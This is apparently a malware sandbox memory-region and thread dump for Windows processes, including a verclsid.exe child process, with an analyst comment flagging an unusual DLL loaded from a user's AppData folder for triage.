filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3817
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3818
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 3819
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3947
start_va = 0x1b0000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 3948
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3949
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3950
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3951
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3952
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3953
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3954
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3955
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3956
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3957
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3958
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3959
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3960
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3961
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3962
start_va = 0x7fefadf0000
end_va = 0x7fefadf9fff
monitored = 0
entry_point = 0x7fefadf260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 3963
start_va = 0x7fefd6a0000
end_va = 0x7fefd70cfff
monitored = 0
entry_point = 0x7fefd6a1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 3964
start_va = 0xc0000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3965
start_va = 0x370000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 3966
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3967
start_va = 0x100000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 3968
start_va = 0x470000
end_va = 0x5f7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3969
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3970
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3971
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3972
start_va = 0x600000
end_va = 0x780fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 3973
start_va = 0x790000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 3974
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 3975
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3976
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3977
start_va = 0x1b90000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 3978
start_va = 0x1b0000
end_va = 0x22cfff
monitored = 0
entry_point = 0x1bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3979
start_va = 0x270000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 3980
start_va = 0x1b0000
end_va = 0x22cfff
monitored = 0
entry_point = 0x1bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3981
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 3982
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3983
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 3984
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 3985
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3986
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 3987
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3988
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3989
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3990
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3991
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3992
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3993
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3994
start_va = 0x1e40000
end_va = 0x1ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e40000"
filename = ""
Region:
id = 3995
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 3996
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3997
start_va = 0x1ec0000
end_va = 0x1fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ec0000"
filename = ""
Region:
id = 3998
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3999
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4000
start_va = 0x1fc0000
end_va = 0x228efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4001
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4002
start_va = 0x1d20000
end_va = 0x1d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 4003
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4004
start_va = 0x2330000
end_va = 0x23affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 4005
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4006
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4007
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4008
start_va = 0x7fefab50000
end_va = 0x7fefab58fff
monitored = 0
entry_point = 0x7fefab511a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 4009
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4010
start_va = 0x1b90000
end_va = 0x1c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 4011
start_va = 0x1c80000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 4012
start_va = 0x7fefc060000
end_va = 0x7fefc094fff
monitored = 0
entry_point = 0x7fefc061064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 4013
start_va = 0x23e0000
end_va = 0x245ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 4014
start_va = 0x2460000
end_va = 0x253efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002460000"
filename = ""
Region:
id = 4015
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 4016
start_va = 0x7fefc0a0000
end_va = 0x7fefc0b7fff
monitored = 0
entry_point = 0x7fefc0a1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Thread:
id = 148
os_tid = 0x500
Thread:
id = 149
os_tid = 0x514
Thread:
id = 150
os_tid = 0x518
Thread:
id = 151
os_tid = 0x528
Thread:
id = 152
os_tid = 0x52c
Thread:
id = 153
os_tid = 0x530
Thread:
id = 154
os_tid = 0x548
Thread:
id = 264
os_tid = 0x624
Process:
id = "26"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x7ab5b000"
os_pid = "0x558"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0x4fc"
cmd_line = "verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4179
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4180
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4181
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4182
start_va = 0x70000
end_va = 0xeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 4183
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4184
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4185
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4186
start_va = 0xfffd0000
end_va = 0xfffd6fff
monitored = 0
entry_point = 0xfffd1b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 4187
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4188
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4189
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4190
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4191
start_va = 0xf0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 4192
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4193
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4194
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4195
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4196
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4197
start_va = 0xf0000
end_va = 0x156fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4198
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 4199
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4200
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4201
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4202
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4218
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4219
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4220
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4221
start_va = 0x50000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4222
start_va = 0x160000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 4223
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 4224
start_va = 0x260000
end_va = 0x288fff
monitored = 0
entry_point = 0x261010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4225
start_va = 0x260000
end_va = 0x288fff
monitored = 0
entry_point = 0x261010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4226
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4227
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4228
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 4229
start_va = 0x6d0000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 4251
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4252
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4253
start_va = 0x60000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 4254
start_va = 0x1ad0000
end_va = 0x1b4cfff
monitored = 0
entry_point = 0x1adcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4255
start_va = 0x1ad0000
end_va = 0x1b4cfff
monitored = 0
entry_point = 0x1adcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4256
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4257
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4258
start_va = 0x1ad0000
end_va = 0x1c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ad0000"
filename = ""
Region:
id = 4340
start_va = 0x1ad0000
end_va = 0x1baefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ad0000"
filename = ""
Region:
id = 4341
start_va = 0x1bb0000
end_va = 0x1c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 4342
start_va = 0x7fefa530000
end_va = 0x7fefa586fff
monitored = 0
entry_point = 0x7fefa531118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 4343
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 4344
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4345
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4346
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4347
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4362
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
# Analyst note: within this verclsid.exe process this is the only mapped
# image that is both monitored (monitored = 1) and has a non-zero entry
# point; the other monitored mapped files are cache .db files with
# entry_point = 0x0. It is backed by a file in a GUID-named directory under
# the user's AppData\Local rather than a Windows system directory, and that
# directory GUID differs from the CLSID on the process command line.
# Hash, signature and prevalence checks on this file are the natural next
# triage step.
Region:
id = 4364
start_va = 0x1c30000
end_va = 0x1c72fff
monitored = 1
entry_point = 0x1c58ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 4365
start_va = 0x7fefb560000
end_va = 0x7fefb577fff
monitored = 0
entry_point = 0x7fefb561010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 4366
start_va = 0x7fefc970000
end_va = 0x7fefc978fff
monitored = 0
entry_point = 0x7fefc971070
region_type = mapped_file
name = "wsock32.dll"
